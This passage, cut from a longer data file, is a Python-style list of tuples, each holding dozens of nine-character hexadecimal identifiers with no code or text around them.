'3ee95e3ef', '7f8027faf'), ('55e30b08f', '24fef0850', '1ac1a10d6', '29c64fa08', '82e9efdd8', 'befe0f9c4', '4f0d3819a', '849c542c3', '4f325b517', '57e01acca', '54481feaa', '3ebf86dd5', '849c464e7', '248db7ce7', '82c164590', '7fd7c9eae', '9fe78f046', 'e92c373a6', 'abace6b29', 'd6be59f6a', '2d1dd55ed', '9a9b4a012', '0ae364eb9', 'db1b70fc8', '916ac9986', '545d84e13', '049e4daae', '95837bbfb', '9b8eff1d7', '17a6e2978', 'b7ae337fe', '256f1449f', '89a26cda9', '1930cefda', '42451bcbf', '722a0187a', '5a86cabd0', 'e14727834', '21a3176c5', '16bf8b4ec'), ('5b465f819', 'a2aa0e4e9', '944e05d50', '4f8b27b6b', 'a498f253f', 'c73c31769', '025dea3b3', '616c01612', 'f3316966c', '83ea288de', '2dbeac1de', '47b7b878f', 'b4d41b335', '686d60d8a', '6dcd9e752', '7210546b2', '78edb3f13', '7f9d59cb3', '30992dccd', '26144d11f', 'a970277f9', '0aea1fd67', 'dc528471e', 'd51d10e38', 'efa99ed98', '48420ad48', '7f38dafa6', '1af4ab267', '3a13ed79a', '73445227e', '971631b2d', '57c4c03f6', '7f91dc936', '0784536d6', 'c3c3f66ff', '052a76b0f', 'ffb34b926', '9d4f88c7b', '442b180b6', '948e00a8d'), ('5bc10886b', '292471107', 'fe919be32', 'b1a7086ac', '88f64cd8b', '00c467392', 'e24e3b26d', '42ebbcafa', 'ee7c4db36', 'b5c9b4e39', 'adc894423', '9ba5eb33d', 'd0631e6c0', 'c611e1778', '2947535d9', 'ef2056ce5', '79af1068d', '098913433', 'dcf8a669f', 'ce0ee5a89', 'f6a05ad95', '831a9e087', '572f63ba5', '8fc5f0637', 'fb36b89d9', '0926408ae', '63688d3df', '9ddb5842c', '2ea3f3caf', '32ebdadbc', '92fd74409', 'b8fde5765', '2c97120d8', '44146018f', '67b44278a', '8afae1db8', 'fd5c6c5aa', 'b04bab75e', '9ee0b383b', '77f5250e3'), ('5bf913a56', 'e6c050854', 'edc3f10a1', '3607eabff', '5cec9a2fc', '68153d35e', '193b90919', '5bca7197d', 'da2a2f42d', '0f2b86f4a', '280898a2f', '1c6c0ffb1', 'ec2a9147d', '1ba077222', 'f115e74c0', '34b2a678e', 'cc0045289', 'c00356999', '09184c121', '799625b2f', '5b714cd7a', 'd14ac08a8', '5ef415428', 'f51378159', 'd5dcaa04a', 'e8522c145', '7610d0f28', '20ff37b40', '5b9e32dbe', 'dd84674d0', '587a5d8c3', '2c1ed7d88', '86f0ede14', '05e427fe8', '45226872a', '003da5628', 'fbbd5f5ae', 'a8b6710d0', '99197edf2', 'a1995906f'), ('63be1f619', '36a56d23e', '9e2040e5b', 'a00a63886', '4edc3388d', '5f11fbe33', '26e998afd', 'f7faf2d9f', '992b5c34d', 'f7f553aea', '7e1c4f651', 'f5538ee5c', '711c20509', '55338de22', '374b83757', 'f41f0eb2f', 'bf10af17e', 'e2979b858', 'd3ed79990', 'fe0c81eff', '5c0df6ac5', '82775fc92', 'f1c20e3ef', 'fa9d6b9e5', 'a8b590c6e', 'b5c4708ad', 'c9aaf844f', 'fe3fe2667', '50a6c6789', '8761d9bb0', 'b6403de0b', '2b6f74f09', '5755fe831', '91ace30bd', '84067cfe0', '15e4e8ee5', 'd01cc5805', '870e70063', '2bd16b689', '8895ea516'), ('6469d38ef', '22ff4e1b8', 'cf4a89033', '2d7f256c6', 'e98dd91da', 'bce33962d', 'cdaf3e576', '78b2cf944', 'b3dbb1222', 'a2d707f4e', 'a5565ec7d', '26b423c42', '2731a96a2', 'c24634d56', 'dc61677e5', '62c319fd1', 'fbe583de5', 'ab7534e84', '92eb376f1', '7def2d7d3', '657d07d19', 'df08959aa', '48130b04b', 'e0cad27c5', '0b139c060', '99df18cb2', '32c6f9aa6', '7ff7d351b', 'e49fea26e', '403e7e48d', '2c5809e51', 'fe1160758', 'd83991b80', 'ce999e374', '29e58696d', '212226b7b', '950b9cf2d', 'adc70e02f', '7792cebe0', '22f0deffc'), ('65ee014d6', '5c613c9de', '88263a031', '0e72651fe', 'ed76b9206', '884ec1cca', 'c05e7f369', '736e55e5f', '64d91247f', 'be8a71172', '88204c8b7', '5522157d7', '7b922ea8b', '5d900b8ce', '36af55ef1', 'f3e544d66', '12adc9937', '78a879b5d', '63f291ac1', '3e568d6c3', '1413972fe', '5f6ea2fa9', '46e10e042', '982210169', 'a6e843cff', 'dd80d36d7', 'c5e748f6a', 'c1ad8b95a', '8e7a80f64', '533d88707', '69e1143e2', '2cbced573', '4810efa27', '91d95575e', '55c3e1c4e', 'da1d826f5', '92f32943a', '46291c5d1', '9789dc806', 'b266d28ce'), ('6cf7644e0', 'c0004231c', '25968f96e', 'fb8395d97', 'ee9e70298', 'e662f1672', 'eda856f5f', '49f11e712', '43dc0f90c', '11d9e8383', '0738fe5ff', '3268914c7', '08d17e384', '1a67a2101', '406a11b5a', 'e2e6f1d23', '2862eec4f', '9c6bf2983', '0a4e510ee', '14d2c6d95', '0a03426de', '82ade3db6', '8909b68e1', 'aaed60a3d', '879e1f51a', '5cbf1b3ea', '1ecddbaa0', 'b96718230', 'bd550871c', 'c55eb4392', '0743b9c08', '5580c77b0', '25613ca0a', 'de66047b0', '2322dbbbb', '760ef38f1', 'da5c36eee', '2de811f82', 'a760e7f65', '5d8a2a27d'), ('6e00fdaad', 'e0f6a993a', '17e2a7989', '38f5efd6d', 'ce3c09a74', 'a6182b737', '1a44834bf', '940151347', 'dee882846', '034bec11b', '11b0ebe2a', '0db69e82d', '2c338b4d6', 'f34f48706', 'ea397d576', 'ca6c23686', '371ff7a11', 'cb162bd89', '2e762ec53', '1d79bc053', '912f4f5de', 'a25bc2d4a', 'c16a7d537', '268040457', '45cda25bb', '506e25985', 'f62b69c09', 'a8ef2a0d2', '67f9e982f', '0f49e0f05', '85f50c67d', 'c959d372a', '89db78d8e', '94f26b213', '13d853d22', '7bf58da23', '3377a30e2', '357a1f6b5', '19f721ba0', '83e2ae51c'), ('75d240f7b', '376474413', '0892b3439', '4bf2b8e7c', 'f8de3e357', '4d9538272', '50a900e26', 'ca4eab5c5', '8c564ae48', '16a9296fd', '9bed59a71', '683d89bf1', '736fce873', '60b76e463', '6a3b5a968', '890163e1a', '2c136905e', '08d203407', '08af3dd45', 'fbe52b1b2', 'e2b4d4ef7', '78c239acf', '3da2882fd', '10596ddee', '2135da74a', '3e0e55648', 'acee6ff41', '93c1eecb4', 'b6e38a517', 'e9c7ccc05', '2bf7dc91d', '06b19b6c4', 'b0e45a9f7', 'fd206ec4d', 'c63090352', 'df1ed6b50', '28dc3cc44', '7b1ddbabf', '5a88e3d89', 'f2520b601'), ('7ba58c14d', '1fe02bc17', '4672a8299', '8794c72c8', 'cca45417f', '55dbd6bcb', 'e6e2c3779', '3cae817df', '973663d14', 'e8dfb33d5', '9281abeea', '11c01e052', '1520de553', 'edddb1ba5', 'c18b41ac3', '00e87edf2', 'ae72cba0a', 'eb4f2651e', '300398f1c', '6c05550b8', '9b26736c3', '24744410a', '26faf1b2e', '44f09b92d', '19975f6ff', '1bf6240eb', 'e438105db', 'cdc36a26a', '087e01c14', '828b327a6', 'cc62f0df8', '9370aa48d', 'd4815c074', '18321c252', '22fbf6997', 'feed9d437', 'f6c9661fc', '55f2b3d34', '69fe81b64', '1074273db'), ('7f72c937f', '79e55ef6c', '408d86ce9', '7a1e99f69', '736513d36', '0f07e3775', 'eb5a2cc20', '2b0fc604a', 'aecd09bf5', '91de54e0a', '66891582e', '20ef8d615', '8d4d84ddc', 'dfde54714', '2be024de7', 'd19110e37', 'e637e8faf', '2d6bd8275', 'f3b4de254', '5cebca53f', 'c4255588c', '23c780950', 'bc56b26fd', '55f4891bb', '020a817ab', 'c4592ac16', '542536b93', '37fb8b375', '0a52be28f', 'bd7bea236', '1904ce2ac', '6ae9d58e0', '5b318b659', '25729656f', 'f8ee2386d', '589a5c62a', '64406f348', 'e157b2c72', '0564ff72c', '60d9fc568'), ('81de0d45e', '18562fc62', '543c24e33', '0256b6714', 'd6006ff44', '6a323434b', 'e3a38370e', '7c444370b', '8d2d050a2', '9657e51e1', '13f3a3d19', 'b5c839236', '70f3033c6', 'f4b374613', '849125d91', '16b532cdc', '88219c257', '74fb8f14c', 'fd1102929', '699712087', '22501b58e', '9e9274b24', '2c42b0dce', '2c95e6e31', '5263c204d', '526ed2bec', '01f7de15d', 'cdbe394fb', 'adf357c9b', 'd0f65188c', 'b8a716ebf', 'ef1e1fac8', 'a3f2345bf', '110e4132e', '586b23138', '680159bab', 'f1a1562cd', '9f2f1099b', 'bf0e69e55', 'af91c41f0'), ('831cebed2', 'ad064d609', '89e69d1a3', 'b2bc178d8', '41016a42a', 'cff75dd09', 'ef38209dc', '57b902085', '1ecd56251', 'be83085df', '6c7a4567c', '1614f0f84', '489dde24b', 'cba573a9d', 'aab0aeb4b', 'fa422ab84', '6eebf3ca4', '36d75938f', 'f65d1049f', '4415f4c2b', 'e7962beb9', '93715fe15', '4b15885d8', '34b15f335', '56e98e3ad', '262e3fc42', 'e05e1751c', '3c649dad8', '1da5c1b6b', 'f0742e2c4', 'befca8b7e', 'e2c21c4bc', 'bbcb92ecf', 'd1a5f5c20', '96d9b7754', '96be55d28', '667132e4b', '023bc78d8', 'c4e5eb1f1', 'bc2eb559b'), ('844df03d7', '2e7f340f2', '22f95560c', '2a3c59733', 'a1d11c496', '1e403019b', 'e429ad370', 'a165f5761', '6ab79c2fe', 'afac06058', '735ea6729', '95ba53cf8', '9685f5e16', '6879db4be', '227ac0d56', '5da2e6220', 'dc5a8f1d8', '89ca53693', 'dd0491aad', '98d0d2971', '324aaa96f', '3d4a6baed', '2715b2d4a', 'b7f26c1f7', 'b0385cee8', '007d71f12', 'be448d5b9', 'e871db27b', '69918e0c1', '9d2dea573', '43a1bf3e9', 'adc721d55', 'db1da2c31', 'ec1425047', 'cc462dc0b', 'b96c4256a', 'cb5329038'), ('844df03d7', '2e7f340f2', '22f95560c', '2a3c59733', 'a1d11c496', '1e403019b', 'e429ad370', 'a165f5761', '6ab79c2fe', 'afac06058', '735ea6729', '95ba53cf8', '9685f5e16', '6879db4be', '227ac0d56', '5da2e6220', 'dc5a8f1d8', '89ca53693', 'dd0491aad', '98d0d2971', '324aaa96f', '3d4a6baed', '2715b2d4a', 'b7f26c1f7', 'b0385cee8', '007d71f12', 'be448d5b9', 'e871db27b', '69918e0c1', '9d2dea573', '43a1bf3e9', 'adc721d55', 'db1da2c31', 'ec1425047', 'cc462dc0b', 'b96c4256a', 'cb5329038', '3aab2691c', '796855249', 'cd41bbc4e'), ('8677d6620', '75b846f12', '3a01b4018', '23d6be31e', '52695ed4a', 'ba9f3a42c', '135091a07', '19537e282', 'd5d4f936e', '578a07608', '63df94487', '169875559', 'b6ae5f5ca', '315b44e13', '5150b1a17', 'c8c6fe1a0', 'd918835ca', '8768af50f', '2cc11689d', '51c9aee7e', '188a6e279', '649d727e1', 'a8e878643', '8d4f4c571', 'f990bddac', '5719bbfc3', '12d3a67b0', '5f76b9c2f', 'c33a4095a', 'aac0c81ba', '2ba3b18ee', 'be90775f4', '651124842', '51d5e73a8', '8016f08af', 'f80259ab3', '3685524f4', '532740e5d', '30347e683', '806dfdd51'), ('86cefbcc0', '717eff45b', '7d287013b', '8d7bfb911', 'aecaa2bc9', '193a81dce', '8dc7f1eb9', 'c5a83ecbc', '60307ab41', '3da5e42a7', 'd8c61553b', '072ac3897', '1a382b105', 'f3a4246a1', '4e06e4849', '962424dd3', 'a3da2277a', '0a69cc2be', '408d191b3', '98082c8ef', '96b66294d', 'cc93bdf83', 'ffa6b80e2', '226e2b8ac', '678b3f377', 'b56f52246', '4fa02e1a8', '2ef57c650', '9aeec78c5', '1477c751e', 'a3c187bb0', '1ce516986', '080cd72ff', '7a12cc314', 'ead538d94', '480e78cb0', '737d43535', 'a960611d7', '4416cd92c', 'd5e6c18b0'), ('87ffda550', '63c094ba4', '2e103d632', '1c71183bb', 'd5fa73ead', 'e078302ef', 'a6b6bc34a', 'f6eba969e', '0d51722ca', 'ce3d7595b', '6c5c8869c', 'dfd179071', '122c135ed', 'b4cfe861f', 'b7c931383', '44d5b820f', '4bcf15776', '51d4053c7', '1fe5d56b9', 'ea772e115', 'ad009c8b9', '68a945b18', '62fb56487', 'c10f31664', 'cbb673163', 'c8d582dd2', '8781e4b91', 'bd6da0cca', 'ca2b906e8', '11e12dbe8', 'bb0ce54e9', 'c0d2348b7', '77deffdf0', 'f97d9431e', 'a09a238d0', '935ca66a9', '9de83dc23', '861076e21', 'f02ecb19c', '166008929'), ('8ceddccb8', '203c64df6', '2087ed398', '30609ee5b', '7650524a3', 'c07f4daba', '776c262ad', 'e0a18e5b6', 'd8e8397ce', '1ffee02ec', '8389fa5f0', '431e67099', 'eae6fc02f', 'b15a468b2', '5f04745bf', '6d773e96f', '46ee7f2c8', '43ef60caa', 'f41af7c85', 'abc207b83', 'd6bca77b4', '54428f346', 'dc135562a', 'dc6676b1f', '4a3baddf6', '8601a29bc', '072452760', 'af0b98ec8', '79c8119ae', '2dd0e885c', 'bf40c722d', '098721511', '608639adb', 'dd19c0b80', '67db03f3a', '062f6f3f7', '58a1cb6eb', '0de698985', '7f80a96a9', '2f8931894'), ('8f6514df0', '6679fe54f', '5e62457b7', 'f17ff4efd', 'ec7f7017f', 'c02ab7d25', '8c309c553', 'e0b968d7b', '22b980fc8', '3b6b46221', '3e4a6796d', 'c680e9350', '834fb292d', 'e3d33877c', '4052a9419', 'b95be4138', '16517c8b0', '219e051b5', 'a6fbe0987', '37d7af8ad', 'b84b2f72d', '775577e6f', '4f0c5f900', 'a68b83290', '2a2832b07', 'ce1f5b02a', 'a6c9347a7', '82c9b4fcd', '7f78a36f7', 'f49ff3269', '89cffafe9', 'aeb3a6ccf', 'c7753cbfc', '4d6a1439e', '2123a4f36', '5c56fccf1', '03bfe48b2', '6beb0b35d', '9fb38aabe', 'ae141696e'), ('920a04ee2', '93efdb50f', '15ea45005', '78c57d7cd', '91570fb11', 'c5dacc85b', '145c7b018', '590b24ab1', 'c283d4609', 'e8bd579ae', '7298ca1ef', 'ce53d1a35', 'a8f80f111', '2a9fed806', 'feb40ad9f', 'cfd255ee3', '31015eaab', '303572ae2', 'cd15bb515', 'cb5161856', 'a65b73c87', '71d64e3f7', 'ec5fb550f', '4af2493b6', '18b4fa3f5', '3d655b0ed', '5cc9b6615', '88c0ec0a6', '8722f33bb', '5ed0c24d0', '54f26ee08', '04ecdcbb3', 'ade8a5a19', 'd5efae759', 'ac7a97382', 'e1b20c3a6', 'b0fcfeab8', '438b8b599', '43782ef36', 'df69cf626'), ('9a2b0a8be', '856225035', 'f9db72cff', '709573455', '616be0c3e', '19a67cb97', '9d478c2ae', 'cf5b8da95', '9c502dcd9', '2f7b0f5b5', 'd50798d34', '56da2db09', 'c612c5f8f', '08c089775', '7aaefdfd7', '59cb69870', '37c0a4deb', 'fb9a4b46d', 'b4eaa55ea', '304633ac8', '99f22b12d', '65000b269', '4bffaff52', '4c536ffc0', '93a445808', 'e8b513e29', 'a2616a980', '97d5c39cf', '71aae7896', '62d0edc4f', 'c2acc5633', 'c8d5efceb'), ('9a2b0a8be', '856225035', 'f9db72cff', '709573455', '616be0c3e', '19a67cb97', '9d478c2ae', 'cf5b8da95', '9c502dcd9', '2f7b0f5b5', 'd50798d34', '56da2db09', 'c612c5f8f', '08c089775', '7aaefdfd7', '59cb69870', '37c0a4deb', 'fb9a4b46d', 'b4eaa55ea', '304633ac8', '99f22b12d', '65000b269', '4bffaff52', '4c536ffc0', '93a445808', 'e8b513e29', 'a2616a980', '97d5c39cf', '71aae7896', '62d0edc4f', 'c2acc5633', 'c8d5efceb', 'e50c9692b', '2e1287e41', '2baea1172', 'af1e16c95', '01c0495f8', 'b0c0f5dae', '090f3c4f2', '33293f845'), ('9a9fc1aba', 'bbe4423a3', '42e0ec591', 'eae884486', '468d2c3b6', '57e185aad', 'f72edfb37', 'b6f5910aa', '4a39584e5', '951ef1246', '76bfb8732', '4a0e1a740', 'fb5e1b2b7', 'a1f9d1680', 'd3b9b9a70', '77697c671', '0afb0ddcc', '1189ee335', 'bfbc53791', '848b67fcc', 'fc02e674d', '4a8917f77', '1401de8c2', '2a6e64bb9', 'cac875244', '3e1100230', '82f715995', '59cafde1f', '1d81e197a', '3f8854df3', '17b81a716', '26cc05472', '6786ea46d', '1110cf9ea', '621833d9b', '5a798adc1', 'c270cb02b', '26ab20ff9', 'fbaed5913', 'ea01904df'), ('9d4428628', '37f11de5d', '39549da61', 'ceba761ec', '4c60b70b8', '304ebcdbc', '823ac378c', '4e21c4881', '5ee81cb6e', 'eb4a20186', 'f6bdb908a', '6654ce6d8', '65aa7f194', '00f844fea', 'c4de134af', 'a240f6da7', '168c50797', '13d6a844f', '7acae7ae9', '8c61bede6', '45293f374', 'feeb05b3f', 'a5c62af4a', '22abeffb6', '1d0aaa90f', 'c46028c0f', '337b3e53b', 'd6af4ee1a', 'cde3e280a', 'c83fc48f2', 'f99a09543', '85ef8a837', 'a31ba11e6', '64cabb6e7', '93521d470', '46c525541', 'cef9ab060', '375c6080e', '3c4df440f', 'e613715cc'), ('9d5c7cb94', '197cb48af', 'ea4887e6b', 'e1d0e11b5', 'ac30af84a', 'ba4ceabc5', 'd4c1de0e2', '6d2ece683', '9c42bff81', 'cf488d633', '0e1f6696a', 'c8fdf5cbf', 'f14b57b8f', '3a62b36bd', 'aeff360c7', '64534cc93', 'e4159c59e', '429687d5a', 'c671db79e', 'd79736965', '2570e2ba9', '415094079', 'ddea5dc65', 'e43343256', '578eda8e0', 'f9847e9fe', '097c7841e', '018ab6a80', '95aea9233', '7121c40ee', '578b81a77', '96b6bd42b', '44cb9b7c4', '6192f193d', 'ba136ae3f', '8479174c2', '64dd02e44', '4ecc3f505', 'acc4a8e68', '994b946ad'), ('9ddd6d137', '5cfc625f1', '8984e4066', '0ccd6454a', '9397535c7', 'de7063efa', '74f3ac6af', '6bee3733e', '20e2c484e', '5adfe7419', '03a4ccd7c', 'ecbd077d0', '851697562', '60cb16e88', '73a8a4d75', '4c48708d8', 'ea72c62a1', 'bbd16b7a0', '3fa6c395f', 'dba14a5d4', '5d60b9ba7', '7f9e0d947', 'a636266f3', '6931ed626', '76e9423c3', '6723b1708', 'd80abf8bc', '7194699cd', 'e3846e931', 'b66bf9d44', 'c436c7e73', 'b74ef4294', 'a2a1975d6', '1c4157dfd', 'e32ad270b', 'c30399758', 'd45fd5508', 'e97fa47e4', '02827212f', '6f53aee73'), ('9fa984817', '3d23e8abd', '1b681c3f0', '3be4dad48', 'dcfcddf16', 'b25319cb3', 'b14026520', 'c5cb7200e', 'ede70bfea', 'e5ddadc85', '07cb6041d', 'df6a71cc7', 'dc60842fb', '3a90540ab', '6bab7997a', 'c87f4fbfb', '21e0e6ae3', '9b39b02c0', '5f5cfc3c0', '35da68abb', 'f0aa40974', '625525b5d', 'd7978c11c', '2bbcbf526', 'bc2bf3bcd', '169f6dda5', '4ceef6dbd', '9581ec522', 'd4e8dd865', 'bf8150471', '542f770e5', 'b05eae352', '3c209d9b6', 'b2e1308ae', '786351d97', 'e5a8e9154', '2b85882ad', 'dc07f7e11', '14c2463ff', '14a5969a6'), ('a1cd7b681', '9b490abb3', 'b10f15193', '05f54f417', 'a7ac690a8', 'ed6c300c2', 'd0803e3a1', 'b1bb8eac3', 'bd1c19973', 'a34f8d443', '84ec1e3db', '24018f832', '82e01a220', '4c2064b00', '0397f7c9b', 'ba42e41fa', '22d7ad48d', '9abffd22c', 'dbfa2b77f', '2c6c62b54', '9fa38def3', 'ecb354edf', '9c3154ae6', '2f26d70f4', '53102b93f', 'a36b95f78', '1fa0f78d0', '19915a6d3', 'c944a48b5', '482b04cba', '2ce77a58f', '86558e595', 'c3f400e36', '20305585c', 'f8ccfa064', 'dd771cb8e', '9aa27017e', 'cd7f0affd', '236cc1ff5', 'a3fc511cd'), ('a3e023f65', '9126049d8', '6eaea198c', '5244415dd', '0616154cc', '2165c4b94', 'fc436be29', '1834f29f5', '9d5af277d', 'c6850e7db', '6b241d083', '56f619761', '45319105a', 'fcda960ae', '07746dcda', 'c906cd268', 'c24ea6548', '829fb34b8', '89ebc1b76', '22c019a2e', '1e16f11f3', '94072d7a3', '59dfc16da', '9886b4d22', '0b1741a7f', 'a682ef110', 'e26299c3a', '5c220a143', 'ac0493670', '8d8bffbae', '68c7cf320', '3cea34020', 'e9a8d043d', 'afb6b8217', '5780e6ffa', '26628e8d8', '1de4d7d62', '4c53b206e', '99cc87fd7', '593cccdab'), ('a5f8c7929', '330006bce', 'b22288a77', 'de104af37', '8d81c1c27', 'd7285f250', '123ba6017', '3c6980c42', '2d3296db7', '95cdb3ab7', '05527f031', '65753f40f', '45a400659', '1d5df91e2', '233c7c17c', '2a879b4f7', 'c3c633f64', 'fdae76b2c', '05d17ab7a', 'c25078fd7', 'e209569b2', '3fd2b9645', '268b047cd', '3d350431d', '5fb9cabb1', 'b70c76dff', '3f6246360', '89e7dcacc', '12122f265', 'fcc17a41d', 'c5a742ee4', '9e711a568', '597d78667', '0186620d7', '4c095683e', '472cd130b', 'b452ba57e', '2ce2a1cdb', '50c7ea46a', '2761e2b76'), ('a6fd11a84', 'a924cf47a', '4d294d2cf', '1f0a4e1f9', 'e369704a1', 'daedcafad', '51ee03895', '7bddf55e1', '91fd68481', '0809c8241', 'bea06dade', '8c922fa9a', '00b309c64', 'b261b0abe', 'afa9b3198', '0c49d75af', 'e506de1e1', '090fba3ad', 'b67c7783e', '0badd2fa2', 'c333aa06c', 'f98d7054f', '4d1f9e4d7', '903749e8a', '6ba70f5f8', '6cd2424c4', '9f5a3b3c0', '864b62f7d', '4411325ed', 'e5587ec32', '0761cbb48', 'a47445036', 'ce408348f', 'c85a3dcc4', 'c47fe5e84', '284d07c28', 'ae3aa1abd', '8706aa459', 'a1f73b0d3', '693972ceb'), ('a9819bda9', 'ea26c7fe6', '3a89d003b', '1029d9146', '759c9e85d', '1f71b76c1', '854e37761', '56cb93fd8', '946d16369', '33e4f9a0e', '5a6a1ec1a', '4c835bd02', 'b3abb64d2', 'fe0dd1a15', 'de63b3487', 'c059f2574', 'e36687647', 'd58172aef', 'd746efbfe', 'ccf6632e6', 'f1c272f04', 'da7f4b066', '3a7771f56', '5807de036', 'b22eb2036', 'b77c707ef', 'e4e9c8cc6', 'ff3b49c1d', '800f38b6b', '9a1d8054b', '0c9b00a91', 'fe28836c3', '1f8415d03', '6a542a40a', 'd53d64307', 'e700276a2', 'bb6f50464', '988518e2d', 'f0eb7b98f', 'd7447b2c5'), ('b1b17b543', 'da5814d9b', 'b78487210', '9616802bb', '9c720c580', 'bc21e80ff', 'ab7764ead', '1084e5813', 'd9db07d68', '84f287070', 'dd01f3999', '75de1e5b6', 'c3726f249', '0cd22b1b5', '157c8b45f', '155f1b1e5', '1a9501bae', '941244262', '38bbaa62d', 'aafb4ec55', 'f0eee77af', 'b88568883', 'a61ce65a2', '9381024b7', '2b58a21fc', 'a513d67d5', '7ab374cb1', '950f2c435', '607a7b8f0', 'f7d385108', '170655e35', '4fbcb9f95', '22b7e449b', 'e7913a5ce', '5d80001c0', 'a7f94dd85', 'c96615af4', 'd9dc805dd', '1ea2c906f', '2223c664d'), ('b26d16167', '930f989bf', 'ca58e6370', 'aebe1ea16', '03c589fd7', '600ea672f', '9509f66b0', '70f4f1129', 'b0095ae64', '1c62e29a7', '32a0342e2', '2fc5bfa65', '09c81e679', '49e68fdb9', '026ca57fd', 'aacffd2f4', '61483a9da', '227ff4085', '29725e10e', '5878b703c', '50a0d7f71', '0d1af7370', '7c1af7bbb', '4bf056f35', '3dd64f4c4', 'b9f75e4aa', '423058dba', '150dc0956', 'adf119b9a', 'a8110109e', '6c4f594e0', 'c44348d76', 'db027dbaf', '1fcba48d0', '8d12d44e1', '8d13d891d', '6ff9b1760', '482715cbd', 'f81c2f1dd', 'dda820122'), ('b33e83cdc', 'ab8a614fa', 'bf6e38e39', 'eb7981dd4', '30a47af70', 'f7eee8212', '9847e14d8', '1998aa946', '850e01a62', 'ecd4c66ec', '56a21fe66', '3f382323a', 'b0b1c81ac', 'b47be7e76', 'd8ea347e9', 'ccc9ba695', '2e55d0383', 'f471e9e82', '56ec098a1', '172a58959', '809a511d0', 'a5e0d3ddb', '945dad481', 'd66bbb5ed', 'c98c2d3c0', '94ecf4c83', 'bec7c48dd', 'ea18d720e', 'bee71cf84', '2f92a1a45', '3be79d4a5', 'a388d3605', '36cde3ce8', '937854db6', '76e092b8c', '1d744ff92', 'a43c53c45', '6045a2949', '3af1785ee', 'f926a4cb4'), ('b6daeae32', '3bdee45be', '3d6d38290', '5a1589f1a', '961b91fe7', '29c059dd2', 'cfc1ce276', '0a953f97e', '30b3daec2', 'fb5f5836e', 'c7525612c', '6fa35fbba', '72d34a148', 'dcc269cfe', 'bdf773176', '469630e5c', '23db7d793', 'dc10234ae', '5ac278422', '6cf7866c1', 'a39758dae', '45f6d00da', '251d1aa17', '84d9d1228', 'b98f3e0d7', '66146c12d', 'd6470c4ce', '3f4a39818', 'f16a196c6', 'b8f892930', '6f88afe65', 'ed8951a75', '371da7669', '4b9540ab3', '230a025ca', 'f8cd9ae02', 'de4e75360', '540cc3cd1', '7623d805a', 'c2dae3a5a'), ('bb6a5b6e2', '30d424f24', 'eea698cf2', '8a158bbb8', 'acd43607d', '0019109c4', '776e9945e', '67ddf8bdd', '025172af5', '2123a2089', 'd40eb2705', '1b20c5c27', '7bde71e2f', '8ba7eacbb', '932b61d77', 'e3fd6fa46', '53bba91b7', 'd24a55c98', '93f686d09', 'fc5690e51', '0ac076350', '18e3e1563', 'd3ff41260', 'c40750aed', 'f2c0fa7cf', '3c9f7809d', 'c65ab9cb9', '6e738ec87', '3475c6ad7', '5964f1856', 'a6bf610b3', '7f9f72202', 'f57ebfed7', '3dd4cc7a8', '8ec06d490', '99fc30923', '71b203550', '09bf8b0cf', '5c1f412ce', '236910072'), ('bbfff6091', 'c08bf12d7', '555e960e5', 'd00757989', '7f41309db', 'cdd16fdd1', 'ee39e4ce0', '2684a37d2', '1d871bff1', '8f21c5b89', '7961b255d', 'da2d942d5', '044c7e993', '7ec8cff44', 'be5c8f449', 'a72e0bf30', 'b58127585', '10b318bda', '4af7c76b9', '675d9ac8b', 'd817823ff', '8c94e6a4b', '9e45b15cd', '63f968fa6', '6eefca12e', 'ea2bef361', '92b047b55', '06f6a7287', '2ca23426b', '7a27eda46', '3908749a1', '61f7bc574', '39abf0d03', 'b33b29b75', '81e4c7077', '073470b04', '0929d922b', '35c5fe0ff', '205b0cfef', 'a38ea1ca7'), ('bef84d3ad', '6dd2090e5', 'c2cfc2003', '066566b35', '6b0c3789e', 'e8abdb1f5', '94efcb8df', 'e52260590', 'c0f5174c7', '9c3f5714f', '3027b873d', 'dd51d0fae', 'b0d770462', 'a74f5bb0f', '65f701080', '860bf7c04', '92c5f86c3', '06ec9eb8b', 'a98f8a4ca', '9121c8d1b', '148f36817', '8ab2f764a', '8136ce6e4', '85816f8e3', '2193fe798', '219982fda', '3429017f8', '2de8d5d54', '2cdaafb1a', '66671ad38', 'e0df7616e', 'd9a8918f9', '4a14d4e94', '94ef80b78', 'e70581bed', '151d318cd', 'b3058e9ba', 'c0085a739', '72505ebb2', 'e034322f0'), ('c13ee1dc9', 'abb30bd35', 'd2919256b', '66728cc11', 'eab8abf7a', 'cc03b5217', '317ee395d', '38a92f707', '467c54d35', 'e8f065c9d', '2ac62cba5', '6495d8c77', '94cdda53f', '13f2607e4', '1c047a8ce', '28a5ad41a', '05cc08c11', 'b0cdc345e', '38f49406e', '773180cf6', '1906a5c7e', 'c104aeb2e', '8e028d2d2', '0dc333fa1', '28a785c08', '03ee30b8e', '8e5a41c43', '67102168f', '8b5c0fb4e', '14a22ab1a', '9fc776466', '4aafb7383', '8e1dfcb94', '55741d46d', '8f940cb1b', '758a9ab0e', 'fd812d7e0', '4ea447064', '6562e2a2c', '343922109'), ('c928b4b74', '8e4d0fe45', '6c0e0801a', '02861e414', 'aac52d8d9', '041c5d0c9', 'd7875bb6c', 'e7c0cfd0f', 'd48c08bda', '0c9462c08', '57dd44c29', 'a93118262', '850027e38', 'db3839ab0', '27461b158', '32174174c', '9306da53f', '95742c2bf', '5831f4c76', '1e6306c7c', '06393096a', '13bdd610a', 'd7d314edc', '9a07d7b1f', '4d2671746', '822e49b95', '3c8a3ced0', '83635fb67', '1857fbccf', 'c4972742d', 'b6c0969a2', 'e78e3031b', '36a9a8479', 'e79e5f72c', '092271eb3', '74d7f2dc3', '277ef93fc', 'b30e932ba', '8f57141ec', '350473311'), ('c95423453', '84d4d30b8', '3770cb9fa', '3bb7bc789', '13a2ecd25', '5c20afdb3', '29bf806d6', '5c0b5d1d4', '4e98771c9', '3974799dd', '04ef53271', '57412a852', 'd5d85bc77', '963c9c0ac', 'a48a740ef', 'dacebaeaf', '174bec4d1', '4f0b30912', 'e8d16b5b5', 'b728093e6', 'b4a4a4df8', '44c06f79a', '7f3479656', 'ee7e4581d', '890d30d93', '59d2470ed', 'f18d3931b', '055232767', '366841793', '211314d56', '538df95cd', 'dc6902c31', '8ca717e6d', '15b0fe826', 'c6cbb2938', '87ba106d3', '4a9e09bff', 'f7b2550f2', '133714358', '16be01500'), ('ca010e4f8', 'a20b1603b', 'd4c72ccf2', 'ad7fbe4b5', 'b0f5ed414', 'f960e93ae', 'a4bbe86e5', 'fe758841a', '4ca7f1312', '9488c30e3', 'e84eed5ae', '54a1765cc', '1c2a63f01', 'd709df8f9', 'b5b797f71', '770bef1c6', '07c9d1f37', 'ff793343c', 